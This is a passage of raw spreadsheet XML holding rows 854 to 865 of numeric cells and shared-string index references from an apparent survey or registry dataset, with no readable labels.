      <c r="AF854" t="s">
        <v>6614</v>
      </c>
      <c r="AG854">
        <v>0</v>
      </c>
      <c r="AH854">
        <v>19</v>
      </c>
      <c r="AJ854">
        <v>302</v>
      </c>
      <c r="AK854" t="s">
        <v>6615</v>
      </c>
      <c r="AL854" t="s">
        <v>6616</v>
      </c>
      <c r="AM854" t="s">
        <v>6617</v>
      </c>
      <c r="AN854" t="s">
        <v>55</v>
      </c>
      <c r="AO854">
        <v>2017</v>
      </c>
      <c r="AP854" t="s">
        <v>6618</v>
      </c>
      <c r="AQ854" t="s">
        <v>6619</v>
      </c>
      <c r="AR854" t="s">
        <v>6614</v>
      </c>
      <c r="AS854" t="s">
        <v>71</v>
      </c>
      <c r="AT854" t="s">
        <v>58</v>
      </c>
      <c r="AU854">
        <v>24</v>
      </c>
      <c r="AV854">
        <v>2</v>
      </c>
      <c r="AW854">
        <v>0</v>
      </c>
      <c r="AX854">
        <v>0</v>
      </c>
      <c r="AY854">
        <v>11</v>
      </c>
      <c r="AZ854">
        <v>4</v>
      </c>
      <c r="BA854" t="s">
        <v>17000</v>
      </c>
      <c r="BB854" t="s">
        <v>15523</v>
      </c>
      <c r="BC854" t="s">
        <v>13888</v>
      </c>
      <c r="BD854" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="855" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A855">
        <v>1844</v>
      </c>
      <c r="B855" t="s">
        <v>6620</v>
      </c>
      <c r="C855" t="s">
        <v>157</v>
      </c>
      <c r="D855" t="s">
        <v>6621</v>
      </c>
      <c r="E855" t="s">
        <v>142</v>
      </c>
      <c r="F855" t="s">
        <v>6622</v>
      </c>
      <c r="G855" s="1">
        <v>44372</v>
      </c>
      <c r="H855">
        <v>11058</v>
      </c>
      <c r="I855">
        <v>11058</v>
      </c>
      <c r="J855">
        <v>1</v>
      </c>
      <c r="K855">
        <v>0</v>
      </c>
      <c r="L855">
        <v>1</v>
      </c>
      <c r="M855">
        <v>4</v>
      </c>
      <c r="N855">
        <v>0</v>
      </c>
      <c r="O855">
        <v>0</v>
      </c>
      <c r="P855">
        <v>0</v>
      </c>
      <c r="Q855">
        <v>0</v>
      </c>
      <c r="R855">
        <v>0</v>
      </c>
      <c r="S855">
        <v>0</v>
      </c>
      <c r="T855">
        <v>1</v>
      </c>
      <c r="U855">
        <v>600</v>
      </c>
      <c r="V855">
        <v>0</v>
      </c>
      <c r="W855">
        <v>5000</v>
      </c>
      <c r="X855">
        <v>1000</v>
      </c>
      <c r="Y855">
        <v>0</v>
      </c>
      <c r="Z855">
        <v>0</v>
      </c>
      <c r="AA855">
        <v>0</v>
      </c>
      <c r="AB855">
        <v>0</v>
      </c>
      <c r="AC855">
        <v>0</v>
      </c>
      <c r="AD855">
        <v>0</v>
      </c>
      <c r="AE855">
        <v>1</v>
      </c>
      <c r="AF855" t="s">
        <v>6623</v>
      </c>
      <c r="AG855">
        <v>67154</v>
      </c>
      <c r="AH855">
        <v>16</v>
      </c>
      <c r="AJ855">
        <v>241</v>
      </c>
      <c r="AK855" t="s">
        <v>539</v>
      </c>
      <c r="AL855" t="s">
        <v>6587</v>
      </c>
      <c r="AM855" t="s">
        <v>6624</v>
      </c>
      <c r="AN855" t="s">
        <v>55</v>
      </c>
      <c r="AO855">
        <v>2009</v>
      </c>
      <c r="AP855" t="s">
        <v>6625</v>
      </c>
      <c r="AQ855" t="s">
        <v>6590</v>
      </c>
      <c r="AR855" t="s">
        <v>6591</v>
      </c>
      <c r="AS855" t="s">
        <v>71</v>
      </c>
      <c r="AT855" t="s">
        <v>58</v>
      </c>
      <c r="AU855">
        <v>26</v>
      </c>
      <c r="AV855">
        <v>1</v>
      </c>
      <c r="AW855">
        <v>40</v>
      </c>
      <c r="AX855">
        <v>32</v>
      </c>
      <c r="AY855">
        <v>0</v>
      </c>
      <c r="AZ855">
        <v>2</v>
      </c>
      <c r="BA855" t="s">
        <v>17009</v>
      </c>
      <c r="BB855" t="s">
        <v>15546</v>
      </c>
      <c r="BC855">
        <v>0</v>
      </c>
      <c r="BD855" t="s">
        <v>13925</v>
      </c>
    </row>
    <row r="856" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A856">
        <v>1877</v>
      </c>
      <c r="B856" t="s">
        <v>6626</v>
      </c>
      <c r="C856" t="s">
        <v>318</v>
      </c>
      <c r="D856" t="s">
        <v>6627</v>
      </c>
      <c r="E856" t="s">
        <v>363</v>
      </c>
      <c r="F856" t="s">
        <v>6628</v>
      </c>
      <c r="G856" s="1">
        <v>44350</v>
      </c>
      <c r="H856">
        <v>11227</v>
      </c>
      <c r="I856">
        <v>11227</v>
      </c>
      <c r="J856">
        <v>0</v>
      </c>
      <c r="K856">
        <v>0</v>
      </c>
      <c r="L856">
        <v>0</v>
      </c>
      <c r="M856">
        <v>0</v>
      </c>
      <c r="N856">
        <v>0</v>
      </c>
      <c r="O856">
        <v>0</v>
      </c>
      <c r="P856">
        <v>0</v>
      </c>
      <c r="Q856">
        <v>0</v>
      </c>
      <c r="R856">
        <v>0</v>
      </c>
      <c r="S856">
        <v>0</v>
      </c>
      <c r="T856">
        <v>1</v>
      </c>
      <c r="U856">
        <v>0</v>
      </c>
      <c r="V856">
        <v>0</v>
      </c>
      <c r="W856">
        <v>0</v>
      </c>
      <c r="X856">
        <v>0</v>
      </c>
      <c r="Y856">
        <v>0</v>
      </c>
      <c r="Z856">
        <v>0</v>
      </c>
      <c r="AA856">
        <v>0</v>
      </c>
      <c r="AB856">
        <v>0</v>
      </c>
      <c r="AC856">
        <v>0</v>
      </c>
      <c r="AD856">
        <v>0</v>
      </c>
      <c r="AE856">
        <v>60000</v>
      </c>
      <c r="AF856" t="s">
        <v>6629</v>
      </c>
      <c r="AG856">
        <v>90241</v>
      </c>
      <c r="AH856">
        <v>26</v>
      </c>
      <c r="AJ856">
        <v>420</v>
      </c>
      <c r="AK856" t="s">
        <v>936</v>
      </c>
      <c r="AL856" t="s">
        <v>5112</v>
      </c>
      <c r="AM856" t="s">
        <v>6630</v>
      </c>
      <c r="AN856" t="s">
        <v>68</v>
      </c>
      <c r="AO856">
        <v>2016</v>
      </c>
      <c r="AP856">
        <v>8124161033</v>
      </c>
      <c r="AQ856" t="s">
        <v>6631</v>
      </c>
      <c r="AR856" t="s">
        <v>6629</v>
      </c>
      <c r="AS856" t="s">
        <v>371</v>
      </c>
      <c r="AT856" t="s">
        <v>72</v>
      </c>
      <c r="AU856">
        <v>26</v>
      </c>
      <c r="AV856">
        <v>0</v>
      </c>
      <c r="AW856">
        <v>0</v>
      </c>
      <c r="AX856">
        <v>11</v>
      </c>
      <c r="AY856">
        <v>2</v>
      </c>
      <c r="AZ856">
        <v>1</v>
      </c>
      <c r="BA856" t="s">
        <v>17018</v>
      </c>
      <c r="BB856" t="s">
        <v>15570</v>
      </c>
      <c r="BC856">
        <v>0</v>
      </c>
      <c r="BD856" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="857" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A857">
        <v>1808</v>
      </c>
      <c r="B857" t="s">
        <v>6632</v>
      </c>
      <c r="C857" t="s">
        <v>74</v>
      </c>
      <c r="D857" t="s">
        <v>6633</v>
      </c>
      <c r="E857" t="s">
        <v>6634</v>
      </c>
      <c r="F857" t="s">
        <v>6635</v>
      </c>
      <c r="G857" s="1">
        <v>44370</v>
      </c>
      <c r="H857">
        <v>11273</v>
      </c>
      <c r="I857">
        <v>11273</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t="s">
        <v>6636</v>
      </c>
      <c r="AG857">
        <v>55781</v>
      </c>
      <c r="AH857">
        <v>14</v>
      </c>
      <c r="AJ857">
        <v>220</v>
      </c>
      <c r="AK857" t="s">
        <v>2654</v>
      </c>
      <c r="AL857" t="s">
        <v>2655</v>
      </c>
      <c r="AM857" t="s">
        <v>6637</v>
      </c>
      <c r="AN857" t="s">
        <v>55</v>
      </c>
      <c r="AO857">
        <v>2008</v>
      </c>
      <c r="AP857" t="s">
        <v>6638</v>
      </c>
      <c r="AQ857" t="s">
        <v>6639</v>
      </c>
      <c r="AR857" t="s">
        <v>6640</v>
      </c>
      <c r="AS857" t="s">
        <v>71</v>
      </c>
      <c r="AT857" t="s">
        <v>58</v>
      </c>
      <c r="AU857">
        <v>6</v>
      </c>
      <c r="AV857">
        <v>2</v>
      </c>
      <c r="AW857">
        <v>50</v>
      </c>
      <c r="AX857">
        <v>280</v>
      </c>
      <c r="AY857">
        <v>5</v>
      </c>
      <c r="AZ857">
        <v>2</v>
      </c>
      <c r="BA857" t="s">
        <v>17002</v>
      </c>
      <c r="BB857" t="s">
        <v>15526</v>
      </c>
      <c r="BC857" t="s">
        <v>9485</v>
      </c>
      <c r="BD857" t="s">
        <v>14003</v>
      </c>
    </row>
    <row r="858" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A858">
        <v>1890</v>
      </c>
      <c r="B858" t="s">
        <v>6641</v>
      </c>
      <c r="C858" t="s">
        <v>3013</v>
      </c>
      <c r="D858" t="s">
        <v>6642</v>
      </c>
      <c r="E858" t="s">
        <v>644</v>
      </c>
      <c r="F858" t="s">
        <v>6643</v>
      </c>
      <c r="G858" s="1">
        <v>44322</v>
      </c>
      <c r="H858">
        <v>11334</v>
      </c>
      <c r="I858">
        <v>11334</v>
      </c>
      <c r="J858">
        <v>0</v>
      </c>
      <c r="K858">
        <v>1</v>
      </c>
      <c r="L858">
        <v>0</v>
      </c>
      <c r="M858">
        <v>2</v>
      </c>
      <c r="N858">
        <v>0</v>
      </c>
      <c r="O858">
        <v>0</v>
      </c>
      <c r="P858">
        <v>0</v>
      </c>
      <c r="Q858">
        <v>1</v>
      </c>
      <c r="R858">
        <v>1</v>
      </c>
      <c r="S858">
        <v>0</v>
      </c>
      <c r="T858">
        <v>1</v>
      </c>
      <c r="U858">
        <v>0</v>
      </c>
      <c r="V858">
        <v>10000</v>
      </c>
      <c r="W858">
        <v>0</v>
      </c>
      <c r="X858">
        <v>1000</v>
      </c>
      <c r="Y858">
        <v>0</v>
      </c>
      <c r="Z858">
        <v>0</v>
      </c>
      <c r="AA858">
        <v>0</v>
      </c>
      <c r="AB858">
        <v>100</v>
      </c>
      <c r="AC858">
        <v>30</v>
      </c>
      <c r="AD858">
        <v>0</v>
      </c>
      <c r="AE858">
        <v>5000</v>
      </c>
      <c r="AF858" t="s">
        <v>6644</v>
      </c>
      <c r="AG858">
        <v>28714</v>
      </c>
      <c r="AH858">
        <v>4</v>
      </c>
      <c r="AJ858">
        <v>83</v>
      </c>
      <c r="AK858" t="s">
        <v>6645</v>
      </c>
      <c r="AL858" t="s">
        <v>6646</v>
      </c>
      <c r="AM858" t="s">
        <v>6647</v>
      </c>
      <c r="AN858" t="s">
        <v>55</v>
      </c>
      <c r="AO858">
        <v>2016</v>
      </c>
      <c r="AP858">
        <v>8116905678</v>
      </c>
      <c r="AQ858" t="s">
        <v>6648</v>
      </c>
      <c r="AR858" t="s">
        <v>6644</v>
      </c>
      <c r="AS858" t="s">
        <v>71</v>
      </c>
      <c r="AT858" t="s">
        <v>72</v>
      </c>
      <c r="AU858">
        <v>24</v>
      </c>
      <c r="AV858">
        <v>8</v>
      </c>
      <c r="AW858">
        <v>20</v>
      </c>
      <c r="AX858">
        <v>0</v>
      </c>
      <c r="AY858">
        <v>13</v>
      </c>
      <c r="AZ858">
        <v>2</v>
      </c>
      <c r="BA858" t="s">
        <v>17021</v>
      </c>
      <c r="BB858" t="s">
        <v>15579</v>
      </c>
      <c r="BC858">
        <v>0</v>
      </c>
      <c r="BD858" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="859" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A859">
        <v>1733</v>
      </c>
      <c r="B859" t="s">
        <v>6649</v>
      </c>
      <c r="C859" t="s">
        <v>74</v>
      </c>
      <c r="D859" t="s">
        <v>6650</v>
      </c>
      <c r="E859" t="s">
        <v>142</v>
      </c>
      <c r="F859" t="s">
        <v>6651</v>
      </c>
      <c r="G859" s="1">
        <v>43896</v>
      </c>
      <c r="H859">
        <v>11336</v>
      </c>
      <c r="I859">
        <v>11336</v>
      </c>
      <c r="J859">
        <v>2</v>
      </c>
      <c r="K859">
        <v>0</v>
      </c>
      <c r="L859">
        <v>0</v>
      </c>
      <c r="M859">
        <v>0</v>
      </c>
      <c r="N859">
        <v>0</v>
      </c>
      <c r="O859">
        <v>0</v>
      </c>
      <c r="P859">
        <v>6</v>
      </c>
      <c r="Q859">
        <v>1</v>
      </c>
      <c r="R859">
        <v>10</v>
      </c>
      <c r="S859">
        <v>1</v>
      </c>
      <c r="T859">
        <v>1</v>
      </c>
      <c r="U859">
        <v>1008000</v>
      </c>
      <c r="V859">
        <v>0</v>
      </c>
      <c r="W859">
        <v>0</v>
      </c>
      <c r="X859">
        <v>0</v>
      </c>
      <c r="Y859">
        <v>0</v>
      </c>
      <c r="Z859">
        <v>0</v>
      </c>
      <c r="AA859">
        <v>50000</v>
      </c>
      <c r="AB859">
        <v>50000</v>
      </c>
      <c r="AC859">
        <v>20000</v>
      </c>
      <c r="AD859">
        <v>1</v>
      </c>
      <c r="AE859">
        <v>240000</v>
      </c>
      <c r="AF859" t="s">
        <v>6652</v>
      </c>
      <c r="AG859">
        <v>51149</v>
      </c>
      <c r="AH859">
        <v>14</v>
      </c>
      <c r="AJ859">
        <v>221</v>
      </c>
      <c r="AK859" t="s">
        <v>6653</v>
      </c>
      <c r="AL859" t="s">
        <v>6654</v>
      </c>
      <c r="AM859" t="s">
        <v>6655</v>
      </c>
      <c r="AN859" t="s">
        <v>55</v>
      </c>
      <c r="AO859">
        <v>1995</v>
      </c>
      <c r="AP859" t="s">
        <v>6656</v>
      </c>
      <c r="AQ859" t="s">
        <v>6657</v>
      </c>
      <c r="AR859" t="s">
        <v>6658</v>
      </c>
      <c r="AS859" t="s">
        <v>71</v>
      </c>
      <c r="AT859" t="s">
        <v>58</v>
      </c>
      <c r="AU859">
        <v>25</v>
      </c>
      <c r="AV859">
        <v>2</v>
      </c>
      <c r="AW859">
        <v>44</v>
      </c>
      <c r="AX859">
        <v>120</v>
      </c>
      <c r="AY859">
        <v>26</v>
      </c>
      <c r="AZ859">
        <v>8</v>
      </c>
      <c r="BA859" t="s">
        <v>16983</v>
      </c>
      <c r="BB859" t="s">
        <v>15482</v>
      </c>
      <c r="BC859" t="s">
        <v>9477</v>
      </c>
      <c r="BD859" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="860" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A860">
        <v>1734</v>
      </c>
      <c r="B860" t="s">
        <v>6659</v>
      </c>
      <c r="C860" t="s">
        <v>2060</v>
      </c>
      <c r="D860" t="s">
        <v>6660</v>
      </c>
      <c r="E860" t="s">
        <v>111</v>
      </c>
      <c r="F860" t="s">
        <v>6661</v>
      </c>
      <c r="G860" s="1">
        <v>44382</v>
      </c>
      <c r="H860">
        <v>11562</v>
      </c>
      <c r="I860">
        <v>11562</v>
      </c>
      <c r="J860">
        <v>1</v>
      </c>
      <c r="K860">
        <v>0</v>
      </c>
      <c r="L860">
        <v>2</v>
      </c>
      <c r="M860">
        <v>0</v>
      </c>
      <c r="N860">
        <v>0</v>
      </c>
      <c r="O860">
        <v>0</v>
      </c>
      <c r="P860">
        <v>0</v>
      </c>
      <c r="Q860">
        <v>3</v>
      </c>
      <c r="R860">
        <v>1</v>
      </c>
      <c r="S860">
        <v>0</v>
      </c>
      <c r="T860">
        <v>1</v>
      </c>
      <c r="U860">
        <v>100000</v>
      </c>
      <c r="V860">
        <v>0</v>
      </c>
      <c r="W860">
        <v>6000</v>
      </c>
      <c r="X860">
        <v>0</v>
      </c>
      <c r="Y860">
        <v>0</v>
      </c>
      <c r="Z860">
        <v>0</v>
      </c>
      <c r="AA860">
        <v>0</v>
      </c>
      <c r="AB860">
        <v>200</v>
      </c>
      <c r="AC860">
        <v>2000</v>
      </c>
      <c r="AD860">
        <v>0</v>
      </c>
      <c r="AE860">
        <v>7000</v>
      </c>
      <c r="AF860" t="s">
        <v>6662</v>
      </c>
      <c r="AG860">
        <v>19117</v>
      </c>
      <c r="AH860">
        <v>25</v>
      </c>
      <c r="AJ860">
        <v>445</v>
      </c>
      <c r="AK860" t="s">
        <v>6663</v>
      </c>
      <c r="AL860" t="s">
        <v>5904</v>
      </c>
      <c r="AM860" t="s">
        <v>6664</v>
      </c>
      <c r="AN860" t="s">
        <v>68</v>
      </c>
      <c r="AO860">
        <v>2006</v>
      </c>
      <c r="AP860">
        <v>81356372130</v>
      </c>
      <c r="AQ860" t="s">
        <v>6665</v>
      </c>
      <c r="AR860" t="s">
        <v>6666</v>
      </c>
      <c r="AS860" t="s">
        <v>71</v>
      </c>
      <c r="AT860" t="s">
        <v>72</v>
      </c>
      <c r="AU860">
        <v>22</v>
      </c>
      <c r="AV860">
        <v>1</v>
      </c>
      <c r="AW860">
        <v>14</v>
      </c>
      <c r="AX860">
        <v>8</v>
      </c>
      <c r="AY860">
        <v>2</v>
      </c>
      <c r="AZ860">
        <v>1</v>
      </c>
      <c r="BA860" t="s">
        <v>16755</v>
      </c>
      <c r="BB860" t="s">
        <v>15483</v>
      </c>
      <c r="BC860" t="s">
        <v>9485</v>
      </c>
      <c r="BD860" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="861" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A861">
        <v>1860</v>
      </c>
      <c r="B861" t="s">
        <v>6667</v>
      </c>
      <c r="C861" t="s">
        <v>318</v>
      </c>
      <c r="D861" t="s">
        <v>6668</v>
      </c>
      <c r="E861" t="s">
        <v>363</v>
      </c>
      <c r="F861" t="s">
        <v>364</v>
      </c>
      <c r="G861" s="1">
        <v>44372</v>
      </c>
      <c r="H861">
        <v>11642</v>
      </c>
      <c r="I861">
        <v>11642</v>
      </c>
      <c r="J861">
        <v>0</v>
      </c>
      <c r="K861">
        <v>0</v>
      </c>
      <c r="L861">
        <v>0</v>
      </c>
      <c r="M861">
        <v>0</v>
      </c>
      <c r="N861">
        <v>0</v>
      </c>
      <c r="O861">
        <v>0</v>
      </c>
      <c r="P861">
        <v>0</v>
      </c>
      <c r="Q861">
        <v>0</v>
      </c>
      <c r="R861">
        <v>0</v>
      </c>
      <c r="S861">
        <v>0</v>
      </c>
      <c r="T861">
        <v>1</v>
      </c>
      <c r="U861">
        <v>0</v>
      </c>
      <c r="V861">
        <v>0</v>
      </c>
      <c r="W861">
        <v>0</v>
      </c>
      <c r="X861">
        <v>0</v>
      </c>
      <c r="Y861">
        <v>0</v>
      </c>
      <c r="Z861">
        <v>0</v>
      </c>
      <c r="AA861">
        <v>0</v>
      </c>
      <c r="AB861">
        <v>0</v>
      </c>
      <c r="AC861">
        <v>0</v>
      </c>
      <c r="AD861">
        <v>0</v>
      </c>
      <c r="AE861">
        <v>100000</v>
      </c>
      <c r="AF861" t="s">
        <v>6669</v>
      </c>
      <c r="AG861">
        <v>91958</v>
      </c>
      <c r="AH861">
        <v>26</v>
      </c>
      <c r="AJ861">
        <v>422</v>
      </c>
      <c r="AK861" t="s">
        <v>6670</v>
      </c>
      <c r="AL861" t="s">
        <v>6671</v>
      </c>
      <c r="AM861" t="s">
        <v>6672</v>
      </c>
      <c r="AN861" t="s">
        <v>55</v>
      </c>
      <c r="AO861">
        <v>2001</v>
      </c>
      <c r="AP861">
        <v>819703699</v>
      </c>
      <c r="AQ861" t="s">
        <v>6673</v>
      </c>
      <c r="AR861" t="s">
        <v>6674</v>
      </c>
      <c r="AS861" t="s">
        <v>371</v>
      </c>
      <c r="AT861" t="s">
        <v>72</v>
      </c>
      <c r="AU861">
        <v>7</v>
      </c>
      <c r="AV861">
        <v>7</v>
      </c>
      <c r="AW861">
        <v>0</v>
      </c>
      <c r="AX861">
        <v>0</v>
      </c>
      <c r="AY861">
        <v>5</v>
      </c>
      <c r="AZ861">
        <v>6</v>
      </c>
      <c r="BA861" t="s">
        <v>17016</v>
      </c>
      <c r="BB861" t="s">
        <v>15558</v>
      </c>
      <c r="BC861">
        <v>0</v>
      </c>
      <c r="BD861" t="s">
        <v>10065</v>
      </c>
    </row>
    <row r="862" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A862">
        <v>1848</v>
      </c>
      <c r="B862" t="s">
        <v>6675</v>
      </c>
      <c r="C862" t="s">
        <v>88</v>
      </c>
      <c r="D862" t="s">
        <v>6676</v>
      </c>
      <c r="E862" t="s">
        <v>1245</v>
      </c>
      <c r="F862" t="s">
        <v>6677</v>
      </c>
      <c r="G862" s="1">
        <v>44369</v>
      </c>
      <c r="H862">
        <v>11682</v>
      </c>
      <c r="I862">
        <v>11682</v>
      </c>
      <c r="J862">
        <v>0</v>
      </c>
      <c r="K862">
        <v>1</v>
      </c>
      <c r="L862">
        <v>0</v>
      </c>
      <c r="M862">
        <v>0</v>
      </c>
      <c r="N862">
        <v>0</v>
      </c>
      <c r="O862">
        <v>0</v>
      </c>
      <c r="P862">
        <v>0</v>
      </c>
      <c r="Q862">
        <v>3</v>
      </c>
      <c r="R862">
        <v>15</v>
      </c>
      <c r="S862">
        <v>0</v>
      </c>
      <c r="T862">
        <v>1</v>
      </c>
      <c r="U862">
        <v>0</v>
      </c>
      <c r="V862">
        <v>1000</v>
      </c>
      <c r="W862">
        <v>0</v>
      </c>
      <c r="X862">
        <v>0</v>
      </c>
      <c r="Y862">
        <v>0</v>
      </c>
      <c r="Z862">
        <v>0</v>
      </c>
      <c r="AA862">
        <v>0</v>
      </c>
      <c r="AB862">
        <v>2000</v>
      </c>
      <c r="AC862">
        <v>2000</v>
      </c>
      <c r="AD862">
        <v>0</v>
      </c>
      <c r="AE862">
        <v>2000</v>
      </c>
      <c r="AF862" t="s">
        <v>6678</v>
      </c>
      <c r="AG862">
        <v>80361</v>
      </c>
      <c r="AH862">
        <v>17</v>
      </c>
      <c r="AJ862">
        <v>276</v>
      </c>
      <c r="AK862" t="s">
        <v>5960</v>
      </c>
      <c r="AL862" t="s">
        <v>6679</v>
      </c>
      <c r="AM862" t="s">
        <v>6680</v>
      </c>
      <c r="AN862" t="s">
        <v>55</v>
      </c>
      <c r="AO862">
        <v>2017</v>
      </c>
      <c r="AP862" t="s">
        <v>6681</v>
      </c>
      <c r="AQ862">
        <v>81805304598</v>
      </c>
      <c r="AR862" t="s">
        <v>6682</v>
      </c>
      <c r="AS862" t="s">
        <v>57</v>
      </c>
      <c r="AT862" t="s">
        <v>58</v>
      </c>
      <c r="AU862">
        <v>25</v>
      </c>
      <c r="AV862">
        <v>2</v>
      </c>
      <c r="AW862">
        <v>2</v>
      </c>
      <c r="AX862">
        <v>2</v>
      </c>
      <c r="AY862">
        <v>15</v>
      </c>
      <c r="AZ862">
        <v>12</v>
      </c>
      <c r="BA862" t="s">
        <v>17012</v>
      </c>
      <c r="BB862" t="s">
        <v>15550</v>
      </c>
      <c r="BC862">
        <v>0</v>
      </c>
      <c r="BD862" t="s">
        <v>14101</v>
      </c>
    </row>
    <row r="863" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A863">
        <v>1902</v>
      </c>
      <c r="B863" t="s">
        <v>6683</v>
      </c>
      <c r="C863" t="s">
        <v>157</v>
      </c>
      <c r="D863" t="s">
        <v>6684</v>
      </c>
      <c r="E863" t="s">
        <v>142</v>
      </c>
      <c r="F863" t="s">
        <v>6685</v>
      </c>
      <c r="G863" s="1">
        <v>44371</v>
      </c>
      <c r="H863">
        <v>11722</v>
      </c>
      <c r="I863">
        <v>11722</v>
      </c>
      <c r="J863">
        <v>4</v>
      </c>
      <c r="K863">
        <v>1</v>
      </c>
      <c r="L863">
        <v>2</v>
      </c>
      <c r="M863">
        <v>0</v>
      </c>
      <c r="N863">
        <v>0</v>
      </c>
      <c r="O863">
        <v>0</v>
      </c>
      <c r="P863">
        <v>0</v>
      </c>
      <c r="Q863">
        <v>0</v>
      </c>
      <c r="R863">
        <v>0</v>
      </c>
      <c r="S863">
        <v>0</v>
      </c>
      <c r="T863">
        <v>0</v>
      </c>
      <c r="U863">
        <v>600</v>
      </c>
      <c r="V863">
        <v>1000</v>
      </c>
      <c r="W863">
        <v>12</v>
      </c>
      <c r="X863">
        <v>0</v>
      </c>
      <c r="Y863">
        <v>0</v>
      </c>
      <c r="Z863">
        <v>0</v>
      </c>
      <c r="AA863">
        <v>0</v>
      </c>
      <c r="AB863">
        <v>0</v>
      </c>
      <c r="AC863">
        <v>0</v>
      </c>
      <c r="AD863">
        <v>0</v>
      </c>
      <c r="AE863">
        <v>0</v>
      </c>
      <c r="AF863" t="s">
        <v>6686</v>
      </c>
      <c r="AG863">
        <v>61234</v>
      </c>
      <c r="AH863">
        <v>16</v>
      </c>
      <c r="AJ863">
        <v>242</v>
      </c>
      <c r="AK863" t="s">
        <v>1894</v>
      </c>
      <c r="AL863" t="s">
        <v>6687</v>
      </c>
      <c r="AM863" t="s">
        <v>6688</v>
      </c>
      <c r="AN863" t="s">
        <v>55</v>
      </c>
      <c r="AO863">
        <v>2012</v>
      </c>
      <c r="AP863" t="s">
        <v>6689</v>
      </c>
      <c r="AQ863" t="s">
        <v>6690</v>
      </c>
      <c r="AR863" t="s">
        <v>6686</v>
      </c>
      <c r="AS863" t="s">
        <v>71</v>
      </c>
      <c r="AT863" t="s">
        <v>58</v>
      </c>
      <c r="AU863">
        <v>26</v>
      </c>
      <c r="AV863">
        <v>1</v>
      </c>
      <c r="AW863">
        <v>40</v>
      </c>
      <c r="AX863">
        <v>4</v>
      </c>
      <c r="AY863">
        <v>4</v>
      </c>
      <c r="AZ863">
        <v>10</v>
      </c>
      <c r="BA863" t="s">
        <v>17023</v>
      </c>
      <c r="BB863" t="s">
        <v>15584</v>
      </c>
      <c r="BC863">
        <v>0</v>
      </c>
      <c r="BD863" t="s">
        <v>14083</v>
      </c>
    </row>
    <row r="864" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A864">
        <v>1776</v>
      </c>
      <c r="B864" t="s">
        <v>6691</v>
      </c>
      <c r="C864" t="s">
        <v>74</v>
      </c>
      <c r="D864" t="s">
        <v>6692</v>
      </c>
      <c r="E864" t="s">
        <v>142</v>
      </c>
      <c r="F864" t="s">
        <v>6693</v>
      </c>
      <c r="G864" s="1">
        <v>44378</v>
      </c>
      <c r="H864">
        <v>11782</v>
      </c>
      <c r="I864">
        <v>11782</v>
      </c>
      <c r="J864">
        <v>2</v>
      </c>
      <c r="K864">
        <v>0</v>
      </c>
      <c r="L864">
        <v>3</v>
      </c>
      <c r="M864">
        <v>3</v>
      </c>
      <c r="N864">
        <v>0</v>
      </c>
      <c r="O864">
        <v>0</v>
      </c>
      <c r="P864">
        <v>0</v>
      </c>
      <c r="Q864">
        <v>20</v>
      </c>
      <c r="R864">
        <v>0</v>
      </c>
      <c r="S864">
        <v>0</v>
      </c>
      <c r="T864">
        <v>0</v>
      </c>
      <c r="U864">
        <v>150000</v>
      </c>
      <c r="V864">
        <v>0</v>
      </c>
      <c r="W864">
        <v>5000</v>
      </c>
      <c r="X864">
        <v>1000</v>
      </c>
      <c r="Y864">
        <v>0</v>
      </c>
      <c r="Z864">
        <v>0</v>
      </c>
      <c r="AA864">
        <v>0</v>
      </c>
      <c r="AB864">
        <v>25</v>
      </c>
      <c r="AC864">
        <v>0</v>
      </c>
      <c r="AD864">
        <v>0</v>
      </c>
      <c r="AE864">
        <v>0</v>
      </c>
      <c r="AF864" t="s">
        <v>6694</v>
      </c>
      <c r="AG864">
        <v>59274</v>
      </c>
      <c r="AH864">
        <v>14</v>
      </c>
      <c r="AJ864">
        <v>204</v>
      </c>
      <c r="AK864" t="s">
        <v>748</v>
      </c>
      <c r="AL864" t="s">
        <v>749</v>
      </c>
      <c r="AM864" t="s">
        <v>6695</v>
      </c>
      <c r="AN864" t="s">
        <v>55</v>
      </c>
      <c r="AO864">
        <v>2015</v>
      </c>
      <c r="AP864">
        <v>81391316490</v>
      </c>
      <c r="AQ864">
        <v>81224647841</v>
      </c>
      <c r="AR864" t="s">
        <v>6696</v>
      </c>
      <c r="AS864" t="s">
        <v>71</v>
      </c>
      <c r="AT864" t="s">
        <v>58</v>
      </c>
      <c r="AU864">
        <v>25</v>
      </c>
      <c r="AV864">
        <v>0</v>
      </c>
      <c r="AW864">
        <v>15</v>
      </c>
      <c r="AX864">
        <v>65</v>
      </c>
      <c r="AY864">
        <v>28</v>
      </c>
      <c r="AZ864">
        <v>48</v>
      </c>
      <c r="BA864" t="s">
        <v>16993</v>
      </c>
      <c r="BB864" t="s">
        <v>15503</v>
      </c>
      <c r="BC864">
        <v>0</v>
      </c>
      <c r="BD864" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="865" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A865">
        <v>2202</v>
      </c>
      <c r="B865" t="s">
        <v>6697</v>
      </c>
      <c r="C865" t="s">
        <v>2308</v>
      </c>
      <c r="D865" t="s">
        <v>6698</v>
      </c>
      <c r="E865" t="s">
        <v>142</v>
      </c>
      <c r="F865" t="s">
        <v>6699</v>
      </c>
      <c r="G865" s="1">
        <v>44358</v>
      </c>
      <c r="H865">
        <v>11871</v>
      </c>
      <c r="I865">
        <v>11871</v>
      </c>
      <c r="J865">
        <v>1</v>
      </c>
      <c r="K865">
        <v>0</v>
      </c>
      <c r="L865">
        <v>3</v>
      </c>
      <c r="M865">
        <v>0</v>
      </c>
      <c r="N865">
        <v>0</v>
      </c>
      <c r="O865">
        <v>0</v>
      </c>
      <c r="P865">
        <v>0</v>
      </c>
      <c r="Q865">
        <v>5</v>
      </c>
      <c r="R865">
        <v>5</v>
      </c>
      <c r="S865">
        <v>0</v>
      </c>
      <c r="T865">
        <v>1</v>
      </c>
      <c r="U865">
        <v>200000</v>
      </c>
